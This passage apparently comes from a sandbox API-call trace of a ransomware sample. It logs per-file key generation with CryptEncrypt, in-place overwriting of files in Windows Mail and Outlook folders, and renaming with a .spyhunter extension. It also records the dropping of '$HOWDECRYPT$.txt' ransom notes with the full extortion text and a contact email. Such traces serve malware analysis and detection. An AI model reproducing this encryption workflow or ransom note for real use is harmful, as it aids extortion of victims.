nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed80, lpOverlapped=0x0 | out: lpBuffer=0x248ec57*, lpNumberOfBytesWritten=0x248ed80*=0x127, lpOverlapped=0x0) returned 1 [0155.971] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.971] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed80*=0x2ac, lpOverlapped=0x0) returned 1 [0155.971] CloseHandle (hObject=0xb0) returned 1 [0155.971] GetProcessHeap () returned 0x2c0000 [0155.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c6f0 | out: hHeap=0x2c0000) returned 1 [0155.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.991] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.991] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed7c, lpOverlapped=0x0 | out: lpBuffer=0x248ec53*, lpNumberOfBytesWritten=0x248ed7c*=0x127, lpOverlapped=0x0) returned 1 [0155.991] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.991] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed7c*=0x2ac, lpOverlapped=0x0) returned 1 [0155.992] CloseHandle (hObject=0xb0) returned 1 [0156.006] GetProcessHeap () returned 0x2c0000 [0156.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b0c8 | out: hHeap=0x2c0000) returned 1 [0156.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed18 | out: pbBuffer=0x248ed18) returned 1 [0156.006] GetProcessHeap () returned 0x2c0000 [0156.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.006] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed10*=0x30) returned 1 [0156.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0156.012] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0156.013] GetProcessHeap () returned 0x2c0000 [0156.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.013] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ecd4*=0x2800, lpOverlapped=0x0) returned 1 [0156.019] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.019] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ecd4*=0x2800, lpOverlapped=0x0) returned 1 [0156.020] GetProcessHeap () returned 0x2c0000 [0156.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.020] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.020] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x248ed14*, lpNumberOfBytesWritten=0x248ecd4*=0x4, lpOverlapped=0x0) returned 1 [0156.020] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecd4*=0x30, lpOverlapped=0x0) returned 1 [0156.020] CloseHandle (hObject=0xb0) returned 1 [0156.020] GetProcessHeap () returned 0x2c0000 [0156.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.020] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.spyhunter") returned 107 [0156.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.spyhunter")) returned 1 [0156.021] GetProcessHeap () returned 0x2c0000 [0156.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.021] GetProcessHeap () returned 0x2c0000 [0156.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.021] GetProcessHeap () returned 0x2c0000 [0156.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2afb0 | out: hHeap=0x2c0000) returned 1 [0156.021] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed18 | out: pbBuffer=0x248ed18) returned 1 [0156.021] GetProcessHeap () returned 0x2c0000 [0156.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.021] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed10*=0x30) returned 1 [0156.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.022] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0156.022] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".txt") returned 0x0 [0156.022] GetProcessHeap () returned 0x2c0000 [0156.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.022] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ecd4*=0x6c8, lpOverlapped=0x0) returned 1 [0156.023] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.023] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ecd4*=0x6c8, lpOverlapped=0x0) returned 1 [0156.023] GetProcessHeap () returned 0x2c0000 [0156.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.024] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.024] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x248ed14*, lpNumberOfBytesWritten=0x248ecd4*=0x4, lpOverlapped=0x0) returned 1 [0156.024] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecd4*=0x30, lpOverlapped=0x0) returned 1 [0156.024] CloseHandle (hObject=0xb0) returned 1 [0156.024] GetProcessHeap () returned 0x2c0000 [0156.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.024] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.spyhunter") returned 136 [0156.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.spyhunter")) returned 1 [0156.025] GetProcessHeap () returned 0x2c0000 [0156.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.025] GetProcessHeap () returned 0x2c0000 [0156.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.025] GetProcessHeap () returned 0x2c0000 [0156.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbdf88 | out: hHeap=0x2c0000) returned 1 [0156.025] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed10 | out: pbBuffer=0x248ed10) returned 1 [0156.025] GetProcessHeap () returned 0x2c0000 [0156.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.025] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed08*=0x30) returned 1 [0156.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0156.026] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".txt") returned 0x0 [0156.026] GetProcessHeap () returned 0x2c0000 [0156.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.026] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eccc*=0x2a0, lpOverlapped=0x0) returned 1 [0156.027] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.027] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eccc*=0x2a0, lpOverlapped=0x0) returned 1 [0156.031] GetProcessHeap () returned 0x2c0000 [0156.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.031] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.031] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x248ed0c*, lpNumberOfBytesWritten=0x248eccc*=0x4, lpOverlapped=0x0) returned 1 [0156.031] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eccc*=0x30, lpOverlapped=0x0) returned 1 [0156.032] CloseHandle (hObject=0xb0) returned 1 [0156.032] GetProcessHeap () returned 0x2c0000 [0156.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.032] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.spyhunter") returned 136 [0156.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.spyhunter")) returned 1 [0156.032] GetProcessHeap () returned 0x2c0000 [0156.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.033] GetProcessHeap () returned 0x2c0000 [0156.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.033] GetProcessHeap () returned 0x2c0000 [0156.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbdcf8 | out: hHeap=0x2c0000) returned 1 [0156.033] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed10 | out: pbBuffer=0x248ed10) returned 1 [0156.033] GetProcessHeap () returned 0x2c0000 [0156.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.033] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed08*=0x30) returned 1 [0156.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 126 [0156.033] StrStrW (lpFirst="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpSrch=".txt") returned 0x0 [0156.033] GetProcessHeap () returned 0x2c0000 [0156.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0156.034] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eccc*=0x5e4, lpOverlapped=0x0) returned 1 [0156.035] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.035] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eccc*=0x5e4, lpOverlapped=0x0) returned 1 [0156.035] GetProcessHeap () returned 0x2c0000 [0156.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0156.035] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.035] WriteFile (in: hFile=0xb0, lpBuffer=0x248ed0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x248ed0c*, lpNumberOfBytesWritten=0x248eccc*=0x4, lpOverlapped=0x0) returned 1 [0156.035] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eccc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eccc*=0x30, lpOverlapped=0x0) returned 1 [0156.035] CloseHandle (hObject=0xb0) returned 1 [0156.035] GetProcessHeap () returned 0x2c0000 [0156.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.035] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.spyhunter") returned 136 [0156.035] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.spyhunter")) returned 1 [0156.036] GetProcessHeap () returned 0x2c0000 [0156.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.050] GetProcessHeap () returned 0x2c0000 [0156.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.070] GetProcessHeap () returned 0x2c0000 [0156.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbde40 | out: hHeap=0x2c0000) returned 1 [0156.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\publisher\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.072] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.072] WriteFile (in: hFile=0x178, lpBuffer=0x248ec3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed68, lpOverlapped=0x0 | out: lpBuffer=0x248ec3f*, lpNumberOfBytesWritten=0x248ed68*=0x127, lpOverlapped=0x0) returned 1 [0156.073] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.073] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed68*=0x2ac, lpOverlapped=0x0) returned 1 [0156.073] CloseHandle (hObject=0x178) returned 1 [0156.073] GetProcessHeap () returned 0x2c0000 [0156.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39510 | out: hHeap=0x2c0000) returned 1 [0156.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\$howdecrypt$.txt"), 